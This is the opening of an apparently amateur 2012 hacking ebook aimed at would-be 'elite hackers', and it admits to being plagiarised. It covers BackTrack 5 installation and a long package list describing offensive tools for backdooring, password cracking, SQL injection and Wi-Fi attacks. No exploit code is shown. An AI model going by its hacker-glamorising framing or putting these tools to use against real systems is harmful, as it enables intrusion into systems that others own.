Comprehensive Journey of A Hacker 2012

Comprehensive:
Journey of a Hacker
2012
Vol-(I)
From Intermediate Hacker To Elite
Hacker.
By
Scryptaxxeler
A guide for those who want to be an Elite but
cant get the right direction.
Disclaimer:
This is work of pure plagiarism. It will be
difficult to give reference to all those from
whose works I am going to plagiarize.
However some parts will be work of me any
anyone can copy and distribute it as is.
This will give an insight into the dark world of
hackers, which will include much info
regarding breaking and breaching of cyber
crime laws.
This is not to be used for Illegal purpose.
But is intended for the letting the
common people, System Administrators
know where lies the weakest link.
Remember, the chain is as weak as the
weakest link.
About:
This book is intended to provide information on
how to become an elite hacker.
Its much more than the CEH courses that are
provided for script kiddies.
Brief overviews of the included topics are:

The volume-1 is the Intermediate Level Hackers
Book To hacking which includes:
Metasploit Framework
Burp Suite, W3AF Framework,etc.
How bank accounts are hacked.
Social Engineering Toolkit
The volume-2 is the the Level where Hackers
doesnt rely on exploiting tools, he writes it himself
which includes:
Sandbox Evasions.
Programming skills for a Hacker.
Reversing to the Level Of Assembly.
Heap Spraying, Use after Free, Stack Overflow.

Deciphering the cookie and much more.
PART-I
The hackers Framework
Chapter 1:Setting up a pentest edition of
Linux.
Chapter 2:The Metasploit Framework
Chapter 3:Web Security:The Burp Suite
and W3AF
Chapter 4:Social Engineering Tools
Chapter 1:
Setting up a Penetration Testing
Edition of Linux.
This chapter is intended to introduce to a penetration distribution
of Linux. I will be discussing details of the Backtrack 5.But you
guys can check NodeZero and Ubuntu Pentest Edition.
Lets begin then.
Backtrack:
BackTrack is intended for all audiences from the most savvy security
professionals to early newcomers to the information security field. BackTrack
promotes a quick and easy way to find and update the largest database of
security tools collection to-date. Our community of users range from skilled
penetration testers in the information security field, government entities,
information technology, security enthusiasts, and individuals new to the
security community.
Feedback from all industries and skill levels allows us to truly develop a
solution that is tailored towards everyone and far exceeds anything ever
developed both commercially and freely available. The project is funded
by Offensive Security. Whether youre hacking wireless, exploiting servers,
performing a web application assessment, learning, or social-engineering a
client, BackTrack is the one-stop-shop for all of your security needs.
BackTrack Clean Hard Drive Install
This method of installation is the simplest available. The assumption is that the whole
hard drive is going to be used for BackTrack.
1.
Boot BackTrack on the machine to be installed. Once booted, type in startx to get
to the KDE graphical interface.
2.
Double click the install.sh script on the desktop, or run the command ubiquity in
console.
3.
4.
5.
Select your geographical location and click forward. Same for the Keyboard layout.
The next screen allows you to configure the partitioning layout. The assumption is
that we are deleting the whole drive and installing BackTrack on it.
Accept the installation summary and client Install. Allow the installation to run and
complete. Restart when done.

6.
Log into BackTrack with the default username and password root / toor. Change root
password.
7.
Fix the framebuffer splash by typing fix-splash ( or fix-splash800 if you wish a

800600 framebuffer), reboot.
BackTrack Dual Boot Install with Windows (Tested on Win 7)

This method of installation is the simplest available. The assumption is that the you
have a Windows installation taking up all the space on your drive, and you would like to
resize and repartition your drive to allow a BackTrack install alongside your Windows.
BACK UP YOUR WINDOWS INSTALLATION FIRST.
1.
Boot BackTrack on the machine to be installed. Once booted, type in startx to get
to the KDE graphical interface.
2.
Double click the install.sh script on the desktop, or run the command ubiquity in
console.
3.
Select your geographical location and click forward. Same for the Keyboard layout.
4.
The next screen allows you to configure the partitioning layout. The assumption is
that we are resizing the Windows 7 partition and installing BackTrack on the newly
made space.
5.
Accept the installation summary and client Install. Allow the installation to run and
complete. Restart when done.

6.
Grub should allow you to boot both into BackTrack and Windows.
7.
Log into BackTrack with the default username and password root / toor. Change root
password.
8.
Fix the framebuffer splash by typing fix-splash ( or fix-splash800 if you wish a

800600 framebuffer), reboot.
BackTrack Live USB Install

This method of getting a live install to a USB drive is the simplest available using
Unetbootin. Note that we will format the USB drive and erase its contents.
1.
Plug in your USB Drive (Minimum USB Drive capacity 2 GB)
2.
Format the USB drive to FAT32
3.
Download Unetbootin from http://unetbootin.sourceforge.net/
4.
Start Unetbootin and select diskimage (use the backtrack-final ISO)
5.
Select your USB drive and click OK for creating a bootable BackTrack USB drive
6.
Log into BackTrack with the default username and password root / toor.
Install BackTrack in VMWare.

1.
Follow the basic install instructions here to get BackTrack installed in a VMware
machine.
2.
Log into BackTrack. To install the VMWare drivers, the kernel source and headers
need to be in place. By default in the BackTrack 4 final release, the kernel (denoted by
{version} ) is configured and ready. However in some cases, you might need to make
sure you have the latest kernel sources by typing in:
apt-get update apt-get install linux-source cd /usr/src tar jxpf linux-source{version}.tar.bz2 ln -s linux-source-{version} linux cd linux zcat /proc/config.gz
> .config make scripts make prepare
3.
Now that your kernel sources and headers are in place, run the Install VMWare tools
for the specific guest VM.
4.
Mount the VMWare tools virtual cd, copy over the VMWare tools package and run the
installer:
mount /dev/cdrom3 /mnt/cdrom cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/
cd /tmp/ tar zxpf VMwareTools-{version}.tar.gz cd vmware-tools-distrib ./vmwareinstall.pl
5.
Complete the VMWare tools installation as required. Run fix-splash to reintroduce
the green framebuffer console. Reboot.
Flicked From: Backtrack Official Site.
Well Installation done Lets have some understating of what it

offers:
This will give you location of the Network Exploitation Tools in
backtrack 5(For new users).
As you can see Backtrack has already Grouped the essential Tools
for You.
See other screen shot:
This will take 1000 pages if I give screenshots for all the tools in
Backtrack.The better is I give you the list and you can use google
to find about the tools.Aint that cool.
The List you are going to see will blow you head off. I intended to
include this for reference purposes. You can skip the list to around
100th page. The best way to learn about the tools is to use search
engine which will be give you best access for gaining more
knowlwdge of the tool.
Thanks to ZitsTif for the list that he has uploaded to his site.
#############################NOTE##########################################
Date: Fri Jul 15 16:42:13 EDT 2011
Version: Backtrack 5 - gnome - 32bit
A tool I installed that doesn't come with Backtrack 5 by default:
sysv-rc-conf
Command I ran before running dpkg --list > toolslist.txt
sudo apt-get update && sudo apt-get upgrade -y && sudo msfupdate
I also installed VirtualBox Guest Host Additions.
############################################################################
||/ Name
Description
Version
ii 0trace
1.0-bt4
0trace is a traceroute tool that can be run within an existing, open TCP
connection - therefore bypassing some types of stateful packet filters with
ease.
ii 3proxy
3APA3A 3proxy tiny proxy server
0.6.1-bt2
ii ace
1.10-bt2
ACE (Automated Corporate Enumerator) is a simple yet powerful VoIP Corporate
Directory enumeration tool that mimics the behavior of an IP Phone in order t
ii adduser
add and remove users and groups
3.112ubuntu1
ii admsnmp
SNMP audit scanner.
0.1-bt3
ii afflib
3.6.10-bt1
An open source implementation of AFF written in C.
ii air
2.0.0-bt2
AIR is a GUI front-end to dd/dc3dd designed for easily creating forensic
images.
ii aircrack-ng
1.1-bt9
Aircrack-ng wireless exploitation and enumeration suite
ii alacarte
easy GNOME menu editing tool
0.13.1-0ubuntu1
ii alsa-base
ALSA driver configuration files
1.0.22.1+dfsg-0ubuntu3
ii alsa-tools
1.0.22-0ubuntu1
Console based ALSA utilities for specific hardware
ii alsa-utils
ALSA utilities
1.0.22-0ubuntu5
ii amap
5.2-bt4
Amap is a next-generation tool for assistingnetwork penetration testing. It
performs fast and reliable application protocol detection, independant on the
ii apache2
Apache HTTP Server metapackage
2.2.14-5ubuntu8.4
ii apache2-mpm-prefork
2.2.14-5ubuntu8.4
Apache HTTP Server - traditional non-threaded model
ii apache2-utils
utility programs for webservers
2.2.14-5ubuntu8.4
ii apache2.2-bin
Apache HTTP Server common binary files
2.2.14-5ubuntu8.4
ii apache2.2-common
Apache HTTP Server common files
2.2.14-5ubuntu8.4
ii app-install-data
Ubuntu applications (data files)
rc apparmor
User-space parser utility for AppArmor
rc apparmor-utils
Utilities for controlling AppArmor
0.10.04.7
2.5.1-0ubuntu0.10.04.3
2.5.1-0ubuntu0.10.04.3
ii apport
1.13.3-0ubuntu2
automatically generate crash reports for debugging
ii apport-symptoms
symptom scripts for apport
0.9
ii apt
Advanced front-end for dpkg
0.7.25.3ubuntu9.4
ii apt-transport-https
APT https transport
0.7.25.3ubuntu9.4
ii apt-utils
APT utility programs
0.7.25.3ubuntu9.4
ii aptitude
terminal-based package manager
0.4.11.11-1ubuntu10
ii arping
2.09-bt0
Broadcasts a who-has ARP packet on the network and prints answers.
ii asleap
2.2-bt1
Demonstrates a serious deficiency in proprietary Cisco LEAP networks.
ii asp-auditor
2.2-bt2
Look for common misconfigurations and information leaks in ASP.NET
applications.
ii aspell
GNU Aspell spell-checker
0.60.6-3ubuntu1
ii aspell-en
English dictionary for GNU Aspell
6.0-0-5.1ubuntu3
ii at
3.1.11-1ubuntu5.1
Delayed job execution and batch processing
ii autoconf
automatic configure script builder
2.65-3ubuntu1
ii automake
1:1.11.1-1
A tool for generating GNU Standards-compliant Makefiles
ii autopsy
A graphical interface to TSK.
2.24-bt0
ii autoscan
1.50-bt0
A network scanner (discovering and managing application).
ii autotools-dev
20090611.1
Update infrastructure for config.{guess,sub} files
ii avahi-daemon
Avahi mDNS/DNS-SD daemon
0.6.25-1ubuntu6.2
ii axel
2.4-1
light download accelerator - console version
ii backtrack-bash-profile
bash profile and bashrc files
1.0-bt2
ii backtrack-bootsplash
BackTrack bootsplash
1.0-bt2
ii backtrack-gnome-essential
Gnome menu and themes for BackTrack
1.5-bt3
ii backtrack-menu-icons
BackTrack Menu Icons
1.5-bt3
ii backtrack-utils
Small bash scripts and utilities
1.1-bt0
ii backtrack-wallpapers
BackTrack Wallpapers
1.1-bt0
ii base-files
Debian base system miscellaneous files
5.0.0ubuntu20.10.04.3
ii base-passwd
3.5.22
Debian base system master password and group files
ii bash
The GNU Bourne Again SHell
4.1-2ubuntu3
ii bash-completion
1:1.1-3ubuntu2
programmable completion for the bash shell
ii bc
1.06.95-2
The GNU bc arbitrary precision calculator language
ii bed
0.5-bt1
BED is a program which is designed to check daemons for potential buffer
overflows, format strings et. al.
ii beef
0.4.0.0-bt1
BeEF, the Browser Exploitation Framework is a professional security tool
provided for lawful research and testing purposes. It allows the experienced
pene
ii beef-ng
0.4.2.7-bt1
The Browser Exploitation Framework (BeEF) is a powerful professional security
tool. BeEF is pioneering techniques that provide the experienced penetration
ii bind9-host
Version of 'host' bundled with BIND 9.X
1:9.7.0.dfsg.P1-1ubuntu0.1
ii binfmt-support
Support for extra binary formats
1.2.18
ii binutils
2.20.1-3ubuntu7.1
The GNU assembler, linker and binary utilities
ii bison
1:2.4.1.dfsg-3
A parser generator that is compatible with YACC
ii bkhive
1.1.1-1
Dump the syskey bootkey from a Windows NT/2K/XP system hive
ii blindelephant
1.0-bt3
Blind Elephant is an open-source generic web application fingerprinter that
produces results by examining a small set of static files.
ii blt
2.4z-4.2
the BLT extension library for Tcl/Tk - run-time package
ii bluediving
0.9-bt1
Bluediving is a Bluetooth penetration testing suite.
ii bluemaho
090417-bt0
BlueMaho is GUI-shell (interface) for suite of tools for testing security of
bluetooth devices. It is freeware, opensource, written on python, uses wxPyho
ii bluetooth
Bluetooth support
4.60-0ubuntu8
ii bluez
4.91-bt0
BlueZ is official Linux Bluetooth protocol stack. It is an Open Source project
distributed under GNU General Public License (GPL). BlueZ kernel is part of
ii bluez-alsa
Bluetooth audio support
4.60-0ubuntu8
ii bluez-cups
Bluetooth printer driver for CUPS
4.60-0ubuntu8
ii bluez-gstreamer
Bluetooth GStreamer support
4.60-0ubuntu8
ii bluez-hcidump
Analyses Bluetooth HCI packets
1.42-1build1
ii bluez-utils
Transitional package
4.60-0ubuntu8
ii bogl-bterm
0.1.18-3ubuntu4
Ben's Own Graphics Library - graphical terminal
ii braa
Braa is a tool for making SNMP queries.
0.82-bt2
ii bridge-utils
1.4-5ubuntu2
Utilities for configuring the Linux Ethernet bridge
ii bsdmainutils
8.0.1ubuntu1
collection of more utilities from FreeBSD
ii bsdutils
Basic utilities from 4.4BSD-Lite
1:2.17.2-0ubuntu1.10.04.2
ii bt-system-menu-icons
BackTrack system menu icons
1.0-bt1
ii btscanner
2.1-bt0
btscanner is a tool designed specifically to extract as much information as
possible from a Bluetooth device without the requirement to pair. A detailed i
ii build-essential
11.4build1
Informational list of build-essential packages
ii
bulk-extractor
0.7.18-bt0
A C++ program that scans a disk image (or any other file) and extracts useful
information.
ii burpsuite
1.4-bt0
integrated platform for performing security testing of web applications
ii busybox-initramfs
Standalone shell setup for initramfs
1:1.13.3-1ubuntu11
ii busybox-static
1:1.13.3-1ubuntu11
Standalone rescue shell with tons of builtin utilities
ii byobu
2.68-0ubuntu1.1
a set of useful profiles and a profile-switcher for GNU screen
ii bzip2
1.0.5-4ubuntu0.1
high-quality block-sorting file compressor - utilities
ii ca-certificates
Common CA certificates
20090814
ii ca-certificates-java
Common CA certificates (JKS keystore)
20100406ubuntu1
ii cabextract
1.2-3+lenny1build0.10.04.1
a program to extract Microsoft Cabinet files
ii capplets-data
1:2.30.1-0ubuntu1
configuration applets for GNOME - data files
ii cewl
CeWL, the Custom Word List generator.
3.0-bt6
ii chkrootkit
0.49-bt0
A tool to locally check for signs of a rootkit.
ii chntpw
The Offline NT Password Editor
100627-bt0
ii cisco-auditing-tool
1.0-bt1
Perl script which scans cisco routers for common vulnerabilities.
ii cisco-global-exploiter
13-bt1
Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing
tool.
ii cisco-ocs
Mass cisco scanner
0.1-bt3
ii ciscos
1.3-bt1
Cisco Scanner will scan a range of IP address for Cisco routers that havn't
changed their default password of "cisco".
ii cmospwd
5.0-bt0
Decrypts password stored in cmos used to access BIOS SETUP.
ii cms-explorer
1.0-bt2
CMS Explorer is designed to reveal the the specific modules, plugins,
components and themes that various CMS driven web sites are running.
ii command-not-found
0.2.40ubuntu5
Suggest installation of packages in interactive bash sessions
ii command-not-found-data
0.2.40ubuntu5
Set of data files for command-not-found.
ii complemento
0.7.6-bt3
Complemento is a collection of tools for pentester: LetDown is a powerful tcp
flooder ReverseRaider is a domain scanner that use wordlist scanning or reve
ii console-setup
console font and keymap setup program
1.34ubuntu15
ii console-terminus
4.30-2
Fixed-width fonts for fast reading on the Linux console
ii consolekit
0.4.1-3ubuntu2
framework for defining and tracking users, sessions and seats
ii copy-router-config
Copy Cisco Router config
- Using SNMP.
ii coreutils
The GNU core utilities
4.0-bt3
7.4-2ubuntu3
ii cowpatty
4.3-bt0
coWPAtty - Attacking WPA/WPA2-PSK Exchanges
ii cpio
2.10-1ubuntu2
GNU cpio -- a program to manage archives of files
ii cpp
The GNU C preprocessor (cpp)
4:4.4.3-1ubuntu1
ii cpp-4.4
The GNU C preprocessor
4.4.3-4ubuntu5
ii cpu-checker
0.1-0ubuntu2
tools to help evaluate certain CPU (or BIOS) features
ii cron
process scheduling daemon
3.0pl1-106ubuntu5
ii cryptcat
1.2.1-bt2
Cryptcat is the standard netcat enhanced with twofish encryption.
ii cryptsetup
configures encrypted block devices
2:1.1.0~rc2-1ubuntu13
ii cupp
Common User Passwords Profiler
3.1-bt0
ii cups
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - server
ii cups-bsd
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - BSD commands
ii cups-client
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - client programs (SysV)
ii cups-common
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - common files
ii cups-driver-gutenprint
printer drivers for CUPS
5.2.5-0ubuntu1.1
ii curl
7.19.7-1ubuntu1
Get a file from an HTTP, HTTPS or FTP server
ii cve
Firefox link to Mitre-CVE.
1.0-bt1
ii cvs
Concurrent Versions System
1:1.12.13-12ubuntu1
ii cymothoa
1alpha-bt0
Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into
an existing process.
ii darkmysqli
Multi-Purpose MySQL Injection Tool.
1.0-bt2
ii dash
POSIX-compliant shell
0.5.5.1-3ubuntu2
ii dbus
simple interprocess messaging system
1.2.16-2ubuntu4.2
ii dbus-x11
1.2.16-2ubuntu4.2
simple interprocess messaging system (X11 deps)
ii dc3dd
7.0.0-bt0
A patched version of GNU dd to include a number of features useful for
computer forensics.
ii dcfldd
1.3.4.1-2
enhanced version of dd for forensics and security
ii ddrescue
1.14-bt0
Like dd, dd_rescue does copy data from one file or block device to another.
ii debconf
Debian configuration management system
1.5.28ubuntu4
ii debconf-i18n
1.5.28ubuntu4
full internationalization support for debconf
ii debianutils
3.2.2
Miscellaneous utilities specific to Debian
ii default-jre
1.6-34
Standard Java or Java compatible Runtime
ii default-jre-headless
1.6-34
Standard Java or Java compatible Runtime (headless)
ii defoma
0.11.10-4ubuntu1
Debian Font Manager -- automatic font configuration framework
ii desktop-file-utils
Utilities for .desktop files
0.16-0ubuntu2
ii dhcp3-client
DHCP client
3.1.3-2ubuntu3.2
ii dhcp3-common
3.1.3-2ubuntu3.2
common files used by all the dhcp3* packages
ii dialog
1.1-20080819-1
Displays user-friendly dialog boxes from shell scripts
ii dictionaries-common
1.4.0ubuntu2
Common utilities for spelling dictionary tools
ii diffutils
File comparison utilities
1:2.8.1-18
ii dirbuster
0.12-bt2
DirBuster is a multi threaded java application designed to brute force
directories and files names on web/application servers. Often is the case now
of wh
ii discover
hardware identification system
2.1.2-3
ii discover-data
2.2009.12.19
Data lists for Discover hardware detection system
ii discover1
transitional package
2.1.2-3
ii disktype
9-1
detection of content format of a disk or disk image
ii dmidecode
Dump Desktop Management Interface data
2.9-1.2
ii dmitry
1.3a-bt2
DMitry has the ability to gather as much information as possible about a host.
ii dmraid
1.0.0.rc16-3ubuntu2
Device-Mapper Software RAID support tool
ii dmsetup
2:1.02.39-1ubuntu4.1
The Linux Kernel Device Mapper userspace library
ii dnet-common
Base package for Linux DECnet
2.49ubuntu1
ii dns2tcp
0.5.2-bt1
Dns2tcp is a tool for relaying TCP connections over DNS.
ii dnsenum
1.2.2-bt0
dnsenum script for enumerating DNS servers
ii dnsmap
0.30-bt3
dnsmap is mainly meant to be used by pentesters during the information
gathering/enumeration phase of infrastructure security assessments.
ii dnsrecon
DNS Enumeration Script
0.3-bt2
ii dnstracer
1.9-bt2
Dnstracer determines where a given Domain Name Server (DNS) gets its
information from, and follows the chain of DNS servers back to the servers
which know
ii dnsutils
Clients provided with BIND
ii dnswalk
2.0.2-bt1
dnswalk is a DNS debugger. It performs zone transfers of specifieddomains, and
checks the database in numerous ways for internalconsistency, as well as ac
ii docbook-xml
4.5-7
standard XML documentation system for software and systems
ii dos2unix
5.0-bt0
Includes utilities to convert text files with DOS or Mac line endings to Unix
line endings.
ii dosfstools
3.0.7-1
utilities for making and checking MS-DOS FAT filesystems
ii dpkg
Debian package management system
1.15.5.6ubuntu4.5
ii dpkg-dev
Debian package development tools
1.15.5.6ubuntu4.5
ii dradis
2.7.0-bt3
Dradis is an open source framework to enable effective information sharing,
specially during security assessments.
ii driftnet
0.1.6-bt2
A program which listens to network traffic and picks out images.
ii dsniff
2.4b1-bt1
A collection of tools for network auditing and penetration testing.
ii e2fslibs
ext2/ext3/ext4 file system libraries
1.41.11-1ubuntu2.1
ii e2fsprogs
ext2/ext3/ext4 file system utilities
1.41.11-1ubuntu2.1
ii eapmd5pass
1.4-bt0
An implementation of an offline dictionary attack against the EAP-MD5
protocol.
ii ecryptfs-utils
83-0ubuntu3.1
ecryptfs cryptographic filesystem (utilities)
ii ed
The classic UNIX line editor
1.4-1build1
ii eject
2.1.5+deb1+cvs20081104-7
ejects CDs and operates CD-Changers under Linux
ii enumiax
1.0-bt3
enumIAX is an Inter Asterisk Exchange version 2 (IAX2) protocol username
brute-force enumerator. enumIAX may operate in two distinct modes; Sequential
Use
ii eog
Eye of GNOME graphics viewer program
2.30.0-0ubuntu1
ii esound-clients
Enlightened Sound Daemon - clients
0.2.41-6ubuntu1
ii esound-common
Enlightened Sound Daemon - Common files
0.2.41-6ubuntu1
ii eterm
Enlightened Terminal Emulator
0.9.5-2ubuntu1
ii ethtool
6+20091202-1
display or change Ethernet device settings
ii ettercap-common
1:0.7.3-1.4ubuntu1
Common support files and plugins for ettercap
ii ettercap-desktop
0.7.3-bt2
Multipurpose sniffer/interceptor/logger for switched LAN.
ii ettercap-gtk
1:0.7.3-1.4ubuntu1
Multipurpose sniffer/interceptor/logger for switched LAN
ii evolution-data-server
evolution database backend server
2.28.3.1-0ubuntu6
ii evolution-data-server-common
2.28.3.1-0ubuntu6
architecture independent files for Evolution Data Server
ii evtparse.pl
1.0-bt0
Script to parse Windows 2000/XP/2003 Event Log files.
ii ewf-tools
20100119-1
collection of tools for reading and writing EWF files
ii ewfacquire
20100119-bt1
Use ewfacquire to acquire data from a file or device and store it in the EWF
format.
ii exif
0.6.19-1
command-line utility to show EXIF information in JPEG files
ii exiftool
8.56-bt0
ExifTool is a platform-independent Perl library plus a command-line
application for reading, writing and editing meta information in a wide
variety of fil
ii exiv2
EXIF/IPTC metadata manipulation tool
0.19-1
ii expat
2.0.1-7ubuntu1
XML parsing C library - example application
ii exploitdb
A SVN archive of the exploit-db.
2.0-bt0
ii extract
0.5.23+dfsg-4build1
displays meta-data from files of arbitrary type
ii fakeroot
Gives a fake root environment
1.14.4-1ubuntu1
ii fancontrol
1:3.1.2-2
utilities to read temperature/voltage/fan sensors
ii farpd
Fake ARP user space daemon
0.2-10
ii fasttrack
4.0.1-bt1
Fast-Track is an exploitation framework used to automated penetration testing
efforts.
ii fatback
1.3-bt2
A *nix tool for recovering files from FAT file systems.
ii fcrackzip
1.0-bt1
fcrackzip is a zip password cracker, similar to fzc, zipcrack and others.
ii festival
1.96~beta-10ubuntu1
General multi-lingual speech synthesis system
ii festlex-cmu
CMU dictionary for Festival
1.4.0-6
ii festlex-poslex
1.4.0-5
Part of speech lexicons and ngram from English
ii festvox-kallpc16k
1.4.0-5
American English male speaker for festival, 16khz sample rate
ii fierce
0.9.9-bt4
Fierce is a PERL script that quickly scans domains.
ii fiked
0.0.5-bt0
FakeIKEd, or fiked for short, is a fake IKE daemon supporting just enough of
the standards and Cisco extensions to attack commonly found insecure Cisco VP
ii file
5.03-5ubuntu1
Determines file type using "magic" numbers
ii fimap
0.8.1-bt2
fimap is a little python tool which can find, prepare, audit, exploit and even
google automaticly for local and remote file inclusion bugs in webapps.
ii findutils
4.4.2-1ubuntu1
utilities for finding files--find, xargs
ii firebird2.1-common
2.1.3.18185-0.ds1-6build1
common files for firebird 2.1 servers and clients
ii firebird2.1-common-doc
2.1.3.18185-0.ds1-6build1
copyright, licensing and changelogs of firebird2.1
ii firefox
Firefox web browser
4.0.1-bt0
ii firefox-user-profile
Firefox profile
1.0-bt2
ii flashplugin-installer
Adobe Flash Player plugin installer
10.2.159.1ubuntu0.10.04.1
ii fontconfig
2.8.0-2ubuntu1
generic font configuration library - support binaries
ii fontconfig-config
2.8.0-2ubuntu1
generic font configuration library - configuration
ii foomatic-db
OpenPrinting printer support - database
20100216-0ubuntu3
ii foomatic-db-engine
OpenPrinting printer support - programs
4.0.4-0ubuntu1
ii foomatic-filters
OpenPrinting printer support - filters
4.0.4-0ubuntu1
ii foremost
1.5.7-bt0
A console program to recover files based on their headers, footers, and
internal data structures.
ii fping
2.4b2-bt0
A ping-like program which uses the Internet Control Message Protocol (ICMP)
echo request to determine if a host is up.
ii fragroute
1.2-bt1
fragroute intercepts, modifies, and rewrites egress traffic destined for a
specified host
ii fragrouter
1.6-bt3
Fragrouter is a network intrusion detection evasion toolkit.
ii framework2
A powerful exploitation framework.
2.8-bt0
ii framework3
Metasploit Exploitation Framework
3.7.0-bt1
ii freeradius-wpe
2.1.7-bt1
A patch for the popular open-source FreeRADIUS implementation to demonstrate
RADIUS impersonation vulnerabilities by Joshua Wright and Brad Antoniewicz, d
ii freetds-common
0.82-6build1
configuration files for FreeTDS SQL client libraries
ii friendly-recovery
Make recovery more user-friendly
0.2.10
ii ftester
1.0-bt0
A tool designed for testing firewall filtering policies and Intrusion
Detection System (IDS) capabilities.
ii ftp
The FTP client
0.17-19build1
ii funkload
1.16.0-bt0
FunkLoad is a functional and load web tester, written in Python
ii fuse-utils
Filesystem in USErspace (utilities)
2.8.1-1.1ubuntu3.1
ii fvwm1
1.24r-54
Old version of the F(?) Virtual Window Manager
ii g++
The GNU C++ compiler
4:4.4.3-1ubuntu1
ii g++-4.4
The GNU C++ compiler
4.4.3-4ubuntu5
ii galleta
1.0+20040505-5
An Internet Explorer cookie forensic analysis tool
ii gamin
File and directory monitoring system
0.1.10-1ubuntu3
ii gawk
1:3.1.6.dfsg-4build1
GNU awk, a pattern scanning and processing language
ii gcc
The GNU C compiler
4:4.4.3-1ubuntu1
ii gcc-4.4
The GNU C compiler
4.4.3-4ubuntu5
ii gcc-4.4-base
4.4.3-4ubuntu5
The GNU Compiler Collection (base package)
ii gconf2
2.28.1-0ubuntu1
GNOME configuration database system (support tools)
ii gconf2-common
2.28.1-0ubuntu1
GNOME configuration database system (common files)
ii gedit
2.30.3-0ubuntu0.1
official text editor of the GNOME desktop environment
ii gedit-common
2.30.3-0ubuntu0.1
official text editor of the GNOME desktop environment (support files)
ii genisoimage
9:1.1.10-1ubuntu1
Creates ISO-9660 CD-ROM filesystem images
ii geoip-database
1.4.6.dfsg-17
IP lookup command line tools that use the GeoIP library (country database)
ii gerix-wifi-cracker-ng
2.0-bt2
Aicrack-NG (WPA/WEP) GUI with pyrit support on cracking
ii gettext
GNU Internationalization utilities
0.17-8ubuntu3
ii gettext-base
0.17-8ubuntu3
GNU Internationalization utilities for the base system
ii ghdb
Firefox link to GHDB.
1.0-bt1
ii ghostscript
8.71.dfsg.1-0ubuntu5.3
The GPL Ghostscript PostScript/PDF interpreter
ii ghostscript-cups
The GPL Ghostscript PostScript/PDF interpreter - CUPS filters
ii gir1.0-atk-1.0
The ATK accessibility toolkit
1.30.0-0ubuntu2.1
ii gir1.0-clutter-1.0
1.2.4-0ubuntu1
GObject introspection data for the Clutter 1.0 library
ii gir1.0-freedesktop
0.6.8-1
Introspection data for some FreeDesktop components
ii gir1.0-glib-2.0
0.6.8-1
Introspection data for GLib, GObject, Gio and GModule
ii gir1.0-gtk-2.0
2.20.1-0ubuntu2
The GTK+ graphical user interface library
ii gir1.0-mutter-2.28
GObject introspection data for Mutter
2.28.1~git20091208-1ubuntu7
ii gir1.0-pango-1.0
1.28.0-0ubuntu2.2
Layout and rendering of internationalized text
ii giskismet
1.0-bt2
GISKismet is a wireless recon visualization tool to represent data gathered
using Kismet in a flexible manner. GISKismet stores the information in a datab
ii git-core
1:1.7.0.4-1ubuntu0.2
fast, scalable, distributed revision control system
ii gksu
graphical frontend to su
2.0.2-2ubuntu2
ii globalplatform
6.0.0-bt0
The GlobalPlatform card specification is a standard for the management of the
contents on a smart card. Mainly this comprises the installation and the rem
ii gnome-about
The GNOME about box
1:2.30.2-0ubuntu1
ii gnome-applets
2.30.0-0ubuntu2
Various applets for the GNOME panel - binary files
ii gnome-applets-data
2.30.0-0ubuntu2
Various applets for the GNOME panel - data files
ii gnome-control-center
1:2.30.1-0ubuntu1
utilities to configure the GNOME desktop
ii gnome-core
1:2.28+1ubuntu3
The GNOME Desktop Environment -- essential components
ii gnome-desktop-data
Common files for GNOME desktop apps
1:2.30.2-0ubuntu1
ii gnome-doc-utils
0.20.0-0ubuntu2
a collection of documentation utilities for the GNOME project
ii gnome-exe-thumbnailer
0.7-0ubuntu1~lucid1
Wine .exe and other executable thumbnailer for Gnome
ii gnome-extra-icons
Optional GNOME icons
1.1-2
ii gnome-icon-theme
GNOME Desktop icon theme
2.28.0-1ubuntu1
ii gnome-keyring
2.92.92.is.2.30.3-0ubuntu1.1
GNOME keyring services (daemon and tools)
ii gnome-media
GNOME media utilities
2.30.0-0ubuntu1
ii gnome-media-common
GNOME media utilities - common files
2.30.0-0ubuntu1
ii gnome-menus
2.30.0-0ubuntu4
an implementation of the freedesktop menu specification for GNOME
ii gnome-mime-data
2.18.0-1
base MIME and Application database for GNOME.
ii gnome-panel
launcher and docking facility for GNOME
1:2.30.2-0ubuntu0.2
ii gnome-panel-data
common files for the GNOME Panel
1:2.30.2-0ubuntu0.2
ii gnome-power-manager
2.30.0-0ubuntu1
power management tool for the GNOME desktop
ii gnome-session
The GNOME Session Manager
2.30.0-0ubuntu1
ii gnome-session-bin
2.30.0-0ubuntu1
The GNOME Session Manager - Minimal runtime
ii gnome-settings-daemon
2.30.1-0ubuntu1.1
daemon handling the GNOME session settings
ii gnome-shell
graphical shell for the GNOME desktop
2.28.1~git20091125-1ubuntu0.2
ii gnome-system-monitor
2.28.0-1ubuntu2
Process viewer and system resource monitor for GNOME
ii gnome-terminal
The GNOME terminal emulator application
2.30.2-0ubuntu1
ii gnome-terminal-data
2.30.2-0ubuntu1
Data files for the GNOME terminal emulator
ii gnome-themes-ubuntu
Ubuntu community themes
0.6.1
ii gnome-user-guide
GNOME user's guide
2.30.0+git20100403ubuntu2
ii gnupg
1.4.10-2ubuntu1
GNU privacy guard - a free PGP replacement
ii gnupg-curl
1.4.10-2ubuntu1
GNU privacy guard - a free PGP replacement (cURL)
ii gnuplot
4.2.6-1
A command-line driven interactive plotting program
ii gnuplot-nox
4.2.6-1
ii gnuplot-x11
4.2.6-1
ii goohost
0.0.1-bt1
Simple script that extracts hosts/subdomains, ip or emails for a specific
domain with Google search.
ii gooscan
1.0-bt2
Gooscan is a tool developed by Johny Long. It automates queries against Google
search appliances with the goal to identify vulnerabilities on web sites.
ii gpgv
1.4.10-2ubuntu1
GNU privacy guard - signature verification tool
ii gpsd
Global Positioning System - daemon
2.92-4
ii gpshell
GPshell for Globalplatform
1.4.4-bt0
ii grabber
Grabber is a web application scanner.
0.1-bt1
ii graphviz
rich set of graph drawing tools
2.20.2-8ubuntu3
ii grendel-scan
1.0-bt1
Grendel-Scan is an open-source web application security testing tool.
ii grep
GNU grep, egrep and fgrep
2.5.4-4build1
ii groff
GNU troff text-formatting system
1.20.1-7
ii groff-base
1.20.1-7
GNU troff text-formatting system (base system components)
ii grub-common
1.98-1ubuntu12
GRand Unified Bootloader, version 2 (common files)
ii grub-pc
1.98-1ubuntu12
GRand Unified Bootloader, version 2 (PC/BIOS version)
